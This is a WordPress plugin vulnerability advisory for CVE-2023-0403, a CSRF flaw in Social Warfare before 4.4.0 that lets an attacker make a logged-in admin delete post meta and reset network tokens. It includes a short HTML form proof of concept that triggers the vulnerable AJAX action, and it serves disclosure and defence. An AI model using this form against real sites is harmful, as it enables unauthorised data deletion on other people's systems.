Social Warfare < 4.4.0 – Post Meta Deletion via CSRF | CVE 2023-0403 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some AJAX actions, allowing attackers, to make a logged in admin call them and delete arbitrary post meta as well as reset access tokens related to network via CSRF attacks

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="swp_delete_network_tokens">
    <input type="text" name="network" value="42">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

Fixed in 4.4.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Marco Wotschka

Verified

Yes

WPVDB ID

7140abf5-5966-4361-bd51-ee29d3071a30

Timeline

Publicly Published

2023-01-05 (about 3 years ago)

Added

2023-01-19 (about 3 years ago)

Last Updated

2023-01-23 (about 3 years ago)

Other

Published

Title

Published

2023-04-07

Title

Comments Ratings < 1.1.7 - Cross-Site Request Forgery

Published

2024-06-21

Title

Groundhogg < 3.4.3 - Cross-Site Request Forgery

Published

2024-08-17

Title

WP MultiTasking <= 0.1.12 - Settings Update via CSRF

Published

2025-12-02

Title

Quiz Maker < 6.7.0.83 - Cross-Site Request Forgery

Published

2025-06-19

Title

WP Inventory Manager < 2.3.5 - Cross-Site Request Forgery